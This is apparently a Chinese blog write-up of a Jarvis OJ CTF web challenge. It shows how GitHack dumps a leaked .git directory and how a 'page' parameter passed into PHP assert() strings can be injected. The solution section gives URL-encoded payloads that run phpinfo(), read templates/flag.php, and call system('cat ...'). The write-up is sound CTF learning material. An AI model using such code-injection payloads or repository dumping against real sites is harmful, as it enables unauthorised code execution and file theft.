前言

最近在做ctf的题，碰到了GitHack，刚好大佬学长有一道这方面的题，拿来练练手。现在总结一下。

题目

链接：http://web.jarvisoj.com:32798/

分析

既然知道是git泄露了，那就废话少说，抄家伙！！！
下载GitHack：

git clone https://github.com/lijiejie/GitHack

执行GitHack：

python GitHack.py http://web.jarvisoj.com:32798/.git/

** index.php核心代码：**

1
2
3
4
5
6
7
8
9
10

<?php
   if (isset($_GET['page'])) {
           $page = $_GET['page'];
   } else {
           $page = "home";
   }
   $file = "templates/" . $page . ".php";
   assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
   assert("file_exists('$file')") or die("That file doesn't exist!");
   ?>

分析代码可以看到：

• 需要传个page参数
• file = "templates/".$page.".php"
• 通过assert函数进行了两次友好（）的判断回显，如果不符合假定，就执行or后面的语句

bool assert(mixed $assertion[,string $description])，如果assertion是字符串，他会被assert()当做php代码执行。会执行！！！

解决方法

思路是通过可控变量file传入恶意参数，构造闭合 file_exists(),使assert()执行恶意代码。

• ') or phpinfo();# ——即变成file_exists('') or phpinfo();# ，结果为执行phpinfo()，注意要url编码，本处为了方便阅读，以编码前显示

• ') or print_r(file_get_contents('templates/flag.php');# ——然后在源代码里（临门一脚不要被坑了）

即构造payload1:

?page=')%20or%20print_r(file_get_contents('templates%2fflag.php'))%3b%23

payload2：

','..')===False and system('cat templates/flag.php');//

总结

通过这道题，了解到了GitHack，了解到了git泄露，美滋滋！！！